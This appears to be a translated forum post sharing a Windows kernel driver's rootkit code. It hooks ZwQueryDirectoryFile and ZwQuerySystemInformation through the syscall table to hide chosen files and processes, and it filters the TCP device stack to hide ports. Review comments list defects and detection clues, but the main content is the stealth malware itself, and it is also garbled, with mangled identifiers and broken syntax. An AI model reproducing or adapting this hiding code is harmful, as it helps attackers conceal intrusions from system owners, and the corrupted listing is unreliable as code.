Hide any process, directory / file, registry entry or port
Hide any process, directory / file, registry entry or port
Enumerating processes, directories / files, registry keys and the like ultimately ends up in calls to ZwQueryDirectoryFile, ZwQuerySystemInformation,
ZwxxValueKey and similar functions. To intercept these functions for hiding purposes, you need to implement replacements for them and modify the system-maintained
syscall table so that it dispatches to the functions you prepared in advance. Because the syscall table is not visible from user mode, I had to write a driver running in Ring 0
so that it can be modified. There are already detailed articles on how to perform this modification, so it is not covered here (see Sysinternals.com or the article
written by Webcrazy). Port lookup is a TDI query. TDI exports two devices, \Device\Tcp and \Device\Udp. We can
write a device filter driver that takes over all IRP packets for these two devices before handing them down to the lower driver, and in this way
hide any port. None of the methods above is new; they are old techniques from N years ago. I am just posting them now
to add to the pile; feel free to skip it. Below are the process-, directory / file- and port-hiding code snippets from my driver.
(The registry part is written in the manner of Regmon and is not listed here.)
// Presumably the two 32-bit halves (low word first) of a 64-bit FILETIME
// timestamp, used by the three time fields of _direntry below.
// NOTE(review): this listing is a machine-transcribed copy; identifier case
// (TypeDef, DWLOWDATETIME) is mangled throughout and nothing here compiles
// as written. Code is left byte-for-byte as found.
TypeDef struct _filetime
{
DWORD DWLOWDATETIME;
DWORD DWHIGHDATETIME;
} Filetime;
// Directory-entry record walked by HOOKZWQUERYDIRECTORYFILE below. Each
// record begins with the byte offset to the next record (0 on the last one,
// which is how the hook detects the end of the chain) and ends with a
// variable-length name whose first WCHAR is Suname[0].
// NOTE(review): the struct's closing '}' before "Direntry, * pdirentry;" is
// missing and the Filetime line lacks its ';' -- transcription damage, left
// as found. The hook below never consults wnamelen; see the note there.
Typedef struct _direntry
{
DWORD DWLENTONEXT;      // byte offset to the next record; 0 terminates the chain
DWORD DWATTR;
Filetime FTCREATE, FTLASTACCESS, FTLASTWRITE
DWORD DWUNKNOWN [2];
DWORD DWFILESZELOW;
DWORD DWFILESIGH;
DWORD dwunknown2 [3];
Word wnamelen;          // presumably the byte length of the name -- never read in this excerpt
Word wunknown;
DWORD DWUNKNOWN3;
Word wshortnamelen;
Wchar SWSHORTNAME [12];
Wchar Suname [1];       // first WCHAR of the name; the rest follows in memory
Direntry, * pdirentry;
// Per-thread record that trails each _system_processes entry (see its
// throughs[] member). Nothing in this excerpt reads any of these fields.
// NOTE(review): the PRIORITY and BASEPRIORITY lines lack ';' and the struct
// has no terminating ';' after '}' -- transcription damage, left as found.
Struct _system_threads
{
Large_integer kernetime;
Large_integer usertime;
Large_integer createtime;
Ulong Waittime;
Pvoid Startaddress;
Client_id clientis;
KPRIORITY PRIORITY
KPRIORITY BASEPRIORITY
Ulong contextswitchcount;
Ulong threadState;
Kwait_reason waitreason;
}
// One record of the list that ZwQuerySystemInformation returns for
// information class 5 (SystemProcessInformation). nextentryDelta is the byte
// offset from this record to the next and is 0 on the last record; it is the
// only field HOOKZWQUERYSYSTEMINFORMATION below reads or writes.
// NOTE(review): the BASEPRIORITY line lacks ';', "Ulong reserved2 [2];
// vm_counters vmcounters;" holds two declarations on one line, and the '}'
// is not followed by ';' -- transcription damage, left as found.
Struct _system_processes
{
Ulong nextentryDelta;   // byte offset to the next record; 0 terminates the list
Ulong threadcount;
Ulong reserved [6];
Large_integer createtime;
Large_integer usertime;
Large_integer kernetime;
Unicode_string processname;
KPRIORITY BASEPRIORITY
Ulong processid;
Ulong inheritedFromProcessId;
Ulong handlecount;
Ulong reserved2 [2]; vm_counters vmcounters;
IO_COUNTERS IOCOUNTERS;
Struct _system_threads throughs [1];  // first of threadcount trailing thread records
}
// Hidden Directory / File
// Replacement for ZwQueryDirectoryFile. Forwards every argument unchanged to
// the original (OldzwQueryDirectoryFile), then walks the returned record
// chain and drops each record whose upper-cased name begins with a
// PTR_HIDEDIR name from the list_head list. Parameters and return value are
// those of ZwQueryDirectoryFile, except that the status is replaced when the
// only record returned is dropped.
// NOTE(review) -- defects visible in this excerpt, left unfixed:
//  * NT_SUCCESS(RC) also passes STATUS_PENDING, so when the caller supplied
//    an event or APC routine the walk can start before the buffer is filled.
//  * FileInfoclass is never checked; the buffer is cast to PDIRENTRY
//    whatever layout the caller asked for.
//  * RTLINITUNICODESTRING scans Suname for a NUL terminator; the record's
//    own wnamelen is never consulted, so a counted (unterminated) name is
//    read past its end into the next record.
//  * Both RTLUNICODESTRINGTOANSISTRING calls allocate (last argument TRUE)
//    on every iteration, but the two RTLFreeansString calls run once after
//    the loop, and the conversion results are unchecked: a pool leak per
//    record and, on a failed conversion, a free of an uninitialised buffer.
//  * RTLCompareMemory over Strlen(Ptr->Name) bytes is a prefix test and
//    over-reads when the record's name is shorter than the list name.
//  * The removal copy sizes ILEFT from FILEINFORMATIONBUFFERLENGTH (the
//    caller's capacity), not from the bytes actually returned, and uses
//    RTLCopyMemory on overlapping ranges where RtlMoveMemory is required;
//    Piostatusblock->Information is never reduced afterwards.
//  * Transcription damage: "0x8000000006" has too many digits for a 32-bit
//    NTSTATUS; "IF (Found)" has been swallowed into the comment above its
//    block; ')' is missing on the "p == (pdirentry)" line; '+' is missing
//    before "p-> dwlentonext" twice; "while (!!)" lost its operand; the
//    ANSI_STRING declaration lacks ';'; "/ /" lines are broken comment
//    markers. All left as found.
//  * APROCESSNAME, Parentdirectory, BYTESRETURNED and Object are unused.
// Detection note: the caller still receives the original Information byte
// count for a chain that has been shortened or cut; that mismatch is
// observable from user mode.
NTSTATUS HOOKZWQUERYDIRECTORYFILE
In Handle Hfile,
In Handle HEVENT OPTIONAL,
In Pio_APC_Routine IoapCroutine Optional,
In Pvoid IoapcContext Optional,
OUT PIO_STATUS_BLOCK PIOSTATUSBLOCK,
Out pvoid fileinformationBuffer,
In Ulong FileinformationBufferlength,
IN file_information_class fileinfoclass,
In Boolean Breturnonlyneentry,
In Punicode_String Pathmask Optional,
In Boolean BrestartQuery)
{
NTSTATUS RC;
CHAR APROCESSNAME [80];
ANSI_STRING ANSIFILENAME, ANSIDIRNAME
Unicode_string unifilename;
PP_DIR PTR;
Wchar Parentdirectory [1024] = {0};
INT BYTESRETURNED;
PVOID Object;
// Call the original ZwQueryDirectoryFile with the caller's arguments untouched
RC = ((zwquerydirectoryfile) (OldzwQueryDirectoryFile))
Hfile,
HEVENT,
IOAPCROUTINE,
IOAPCCONTEXT,
Piostatusblock,
FileInformationBuffer,
FileInformationBufferlength,
FileInfoclass,
BreturnonlyoneTry,
Pathmask,
BRESTARTQUERY);
IF (NT_Success (RC))
{
PDIRENTRY P;
PDIRENTRY PLAST;
Bool Blastone;
Int Found;
p = (pdirentry) fileinformationBuffer; // treat the output buffer as a chain of Direntry records
Plast = NULL;
DO
{
// dwlentonext == 0 marks the last record of the chain
Blastone =! (P-> dwlentonext);
// Name -> UNICODE_STRING -> two freshly allocated ANSI copies, one upper-cased in place
RTLINITUNICODESTRING (& UNIFILENAME, P-> Suname);
RTLUNICODESTRINGTOANSISTRING (& AnsifileName, & UnifileName, True);
RTLUNICODESTRINGTOANSISTRING (& ANSIDIRNAME, & UNIFILENAME, TRUE);
RTLUPPERSTRING (& ANSIFILENAME, & ANSIDIRNAME);
Found = 0;
/ / Find if you contain the current directory in the list
// Scan the list for a PTR_HIDEDIR entry whose name is a prefix of this record's name
For (ptr = list_head; ptr! = null; ptr = ptr-> Next)
{
IF (Ptr-> Flag! = PTR_HIDEDIR) Continue;
IF (RTLCompareMemory (ANSIFILENAME.BUFFER, PTR-> Name, Strlen (Ptr-> Name)) == Strlen (Ptr-> Name))
{
FOUND = 1;
Break;
}
} // end for
// If the list contains the current directory, hide it.  NOTE(review): the "if (Found)" that should guard the block below has been swallowed into this comment by the transcription, so as printed the block is unconditional.
{
IF (Blastone)
{
// Last record: fail the whole call if it was the only one, otherwise cut the chain at the previous record
IF (p == (pdirentry) fileinformationBuffer
{
Rc = 0x8000000006; // Hide
}
Else
Plast-> DWLENTONEXT = 0;
Break;
}
Else
{
// Middle record: overwrite it with everything that follows it (overlapping copy -- see note above)
INT IPOS = (Ulong) P) - (Ulong) FileinformationBuffer;
INT ILEFT = (DWORD) FILEINFORMATIONBUFFERLENGTH - IPOS - P-> DWLENTONEXT;
RTLCopyMemory (PVOID) P, (PVOID) ((char *) p p-> dwlentonext), (DWORD) ILEFT);
CONTINUE;
}
}
Plast = P;
P = (PDIRENTRY) ((char *) P P-> dwlentonext);
} while (!!);
// Frees only the last iteration's pair of ANSI strings (see leak note above)
RTLFreeansString (& ANSIDIRNAME);
RTLFreeansString (& ANSIFILENAME);
}
Return (RC);
}
// Hidden process
// Replacement for ZwQuerySystemInformation. Forwards the call to the original
// (OldzwQuerySystemInformation); when it succeeds and the class is 5
// (SystemProcessInformation) it walks the nextentryDelta chain and unlinks
// every record whose name matches a PTR_HIDEPROC entry on the list_head list.
// Parameters and return value are those of ZwQuerySystemInformation; the
// status is returned unchanged.
// NOTE(review) -- defects visible in this excerpt, left unfixed:
//  * Process_name is declared but never filled in the visible code (the line
//    "IF ((0" is truncated and whatever set it is lost), so both Memcmp
//    calls compare against an uninitialised ANSI_STRING.
//  * Memcmp over Strlen(Ptr->Name) bytes is a prefix test, not equality,
//    and over-reads Process_name.buffer when the name is shorter.
//  * In the first-record case the assignment targets SystemInformation,
//    which is this function's own parameter; the caller's pointer is not
//    affected, and the value assigned is a byte delta rather than an
//    address.
//  * g_hide_proc is a local initialised to true, so its test is always
//    taken; the name suggests a global that this copy shadows -- confirm.
//  * Records are unlinked, not erased: the hidden record's bytes remain in
//    the buffer, only skipped by the delta chain.
//  * Transcription damage: "(CHAR *) CURR = CURR-> NEXTENTRYDELTA)" has a
//    cast on the left of '=' and an unbalanced ')'; "ReturnLength;" lacks
//    the closing ')' of the call. Left as found.
//  * APROCESSNAME, process_uname, process_name1, process_name2 are unused.
// Detection note: because the records are left in place, a consumer that
// walks the buffer by record size instead of by nextentryDelta still sees
// them.
NTSTATUS HOOKZWQUERYSYSTEMINFORMATION
In Ulong SystemInformationClass,
In Pvoid SystemInformation,
In Ulong SystemInformationLength,
OUT Pulong ReturnLength)
{
NTSTATUS RC;
ANSI_STRING Process_name, process_uname, process_name1, process_name2;
Bool g_hide_proc = true;
CHAR APROCESSNAME [80];
PP_DIR PTR;
Int Found;
// Call the original ZwQuerySystemInformation with the caller's arguments untouched
RC = ((zwQuerySystemInformation) (OldzwQuerySystemInformation))
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength;
IF (NT_Success (RC))
{
// Class 5 is SystemProcessInformation: a nextentryDelta-linked list of _system_processes records
IF (g_hide_proc && (5 == systeminformationClass))
{
// Treat the output buffer as the first record of the list
Struct _system_processes * curr = (struct _system_processes *) SystemInformation;
Struct _system_processes * prev = null;
// Walk the record chain
While (Curr)
{
IF ((0
{
Found = 0;
// Does any PTR_HIDEPROC list entry prefix-match the current name?
For (ptr = list_head; ptr! = null; ptr = ptr-> Next)
{
IF (Ptr-> Flag! = PTR_HIDEPROC) Continue;
IF (Memcmp (Process_name.buffer, Ptr-> Name, Strlen (Ptr-> Name)) == 0)
{
FOUND = 1;
}
}
// While the current record matches: unlink it and re-test the record that follows
While (Found) {
IF (prev)
{
// Point the previous record past the current one (or terminate the list)
IF (Curr-> NEXTENTRYDELTA)
{
Prev-> NEXTENTRYDELTA = CURR-> NEXTENTRYDELTA;
}
Else
{
Prev-> NEXTENTRYDELTA = 0;
}
}
Else
{
// First record: only this function's local parameter copy changes (see note above)
IF (Curr-> NEXTENTRYDELTA)
{
(char *) Systeminformation = curr-> nextentryDelta;
}
Else
{
Systeminformation = NULL;
}
}
IF (Curr-> NEXTENTRYDELTA) (CHAR *) CURR = CURR-> NEXTENTRYDELTA);
Else
{
Curr = NULL; BREAK;
}
// Re-run the list scan for the record now under curr
Found = 0;
For (ptr = list_head; ptr! = null; ptr = ptr-> Next)
{
IF (Ptr-> Flag! = PTR_HIDEPROC) Continue;
IF (Memcmp (Process_name.buffer, Ptr-> Name, Strlen (Ptr-> Name)) == 0)
{
FOUND = 1;
}
}
}
}
// Advance to the next record; curr becomes NULL on the last one
IF (Curr! = null)
{
Prev = CURR;
IF (Curr-> NEXTENTRYDELTA) (CHAR *) CURR = CURR-> NEXTENTRYDELTA);
Else Curr = NULL;
}
}
}
}
Return (RC);
}
// Hide port
// Port-hiding setup. This reads as a fragment of DriverEntry: driverObject,
// fileObject and i are used without being declared in this excerpt. It
// opens the TCP device by name, creates a filter device, attaches it on top
// of the TCP device stack and records the attach result in M_TcpGetDevice
// for PASSTHROUGH to forward to.
// NOTE(review) -- defects visible in this excerpt, left unfixed:
//  * The file-object reference taken by IOGETDEVICEOBJECTPOINTER is released
//    only at the very end of the setup; the IOCREATEVICE failure return and
//    the attach failure return both leak it.
//  * The attach failure path returns status_success after deleting the
//    device, so the caller cannot tell the filter is not in place.
//  * The new device's Flags are never copied from TcpDevice (I/O method,
//    power-pagable bits), a standard step for filter devices that this
//    excerpt omits -- confirm against the full source.
//  * TCPDRIVER is dereferenced in the loop that follows but never assigned
//    here; TcpDevice, TCPGETDEVICE and FilterDevice are declared at file
//    scope although they are only used during setup.
//  * Transcription damage: the device-name literal has lost its backslashes,
//    "/ N" in the DbgPrint strings stands for a newline escape, the
//    FilterDevice declaration lacks ';', and "/ /" lines are broken comment
//    markers. Left as found.
PDEvice_Object M_TcpGetDevice;
PDEvice_Object TcpDevice;
Unicode_string tcpDeviceName;
PDRIVER_OBJECT TCPDRIVER;
PDEvice_Object TCPGETDEVICE;
PDEvice_Object FilterDevice
PDRIVER_DISPATCH EMPTY;
NTSTATUS STATUS;
// Remember the driver's current IRP_MJ_CREATE handler; the loop below treats any dispatch slot still equal to it as unassigned
Empty = driverObject-> majorfunction [IRP_MJ_CREATE];
RTLINITUNICODESTRING (& TCPDeviceName, L "// device // tcp");
/ / Get existing equipment pointers
// Look up the existing TCP device object (also takes a reference on a file object that must be released)
Status = IOGETDEVICEOBJECTPOINTER (& TCPDeviceName,
FILE_ALL_ACCESS,
& FileObject,
& TcpDevice
);
IF (! NT_Success (status))
{
DBGPrint ("IOGETDEVICEOBJECTPOINTER ERROR! / N");
Return status;
}
DBGPRINT ("IOGETDEVICEOBJECTPOINTER OK! / N");
// Create the unnamed filter device
Status = IOCREATEVICE (DriverObject,
SIZEOF (Device_extension),
NULL,
File_Device_unknown,
0,
False,
& Filterdevice
);
IF (! NT_Success (status))
{
// NOTE(review): fileObject reference from IOGETDEVICEOBJECTPOINTER is not released on this path
Return status;
}
// Attach the filter device on top of the TCP device stack
TCPGETDEVICE = IoattachDeviceTodeviceStack (FilterDevice, TCPDevice);
IF (! tcpgetDevice) {
IodeleteDevice (FilterDevice);
DBGPrint ("IoattachDeventodeviceStack Error! / N");
// NOTE(review): reports success to the caller although nothing was attached
Return status_success;
}
m_tcpgetDevice = tcpgetDevice;
/ / Add to the filter function
// The remainder of the setup (the dispatch-table loop) and the PASSTHROUGH
// dispatch routine, all collapsed onto one line by the transcription; the
// loop bound after "i" and the index into tcpdriver-> majorfunction are lost.
// The loop installs PASSTHROUGH in every major-function slot of this driver
// that still holds the IRP_MJ_CREATE handler, then releases the file-object
// reference taken during setup.
// PASSTHROUGH(DeviceObject, IRP): completes any IRP whose IoControlCode
// equals query_information_ex with status_success and no data, and forwards
// every other IRP down to M_TcpGetDevice with GenericCompletion attached as
// the completion routine; returns the status of that forwarding call.
// NOTE(review) -- defects visible here, left unfixed:
//  * parameters.deviceioControl.iocontrolcode is read for every IRP without
//    first checking that MajorFunction is a device-control code; for other
//    majors that union member holds unrelated data.
//  * IRP-> iostatus.information is never set on the completed path, so the
//    caller receives an unspecified byte count alongside status_success.
//  * The local STATUS is declared and never used.
// Detection note: every query_information_ex through the filter device is
// answered empty-but-successful, not just those for a chosen port (the
// original comment "You can judge a port next step" records that the
// per-port test was never written); a legitimate TDI client sees that.
For (i = 0; i { IF ((tcpdriver-> majorfunction "&& (driverObject-> majorfunction [i] == empty)) { DriverObject-> majorfunction [i] = passthrough; } } ObdereferenceObject (fileObject); NTSTATUS PASSTHROUGH (in PDEvice_Object DeviceObject, in PIRP IRP) { NTSTATUS STATUS; PIO_STACK_LOCATION PIRPSTACK; PirPstack = IOGETCURRENTIRPSTACKLOCATION (IRP); // If you query, complete the IRP. IF (pirpstack-> parameters.deviceioControl.iocontrolcode == query_information_ex) { / / You can judge a port next step. IRP-> iostatus.status = status_success; IOCOMPLETEREQUEST (IRP, IO_NO_INCREMENT); Return status_success; } // Copy the current IRP IocopyCurrentirPstackLocationToneXT (IRP); IOSetCompletionRoutine (IRP, GenericCompletion, NULL, True, True, True ); //transfer Return IocallDriver (M_TcpGetDevice, IRP); }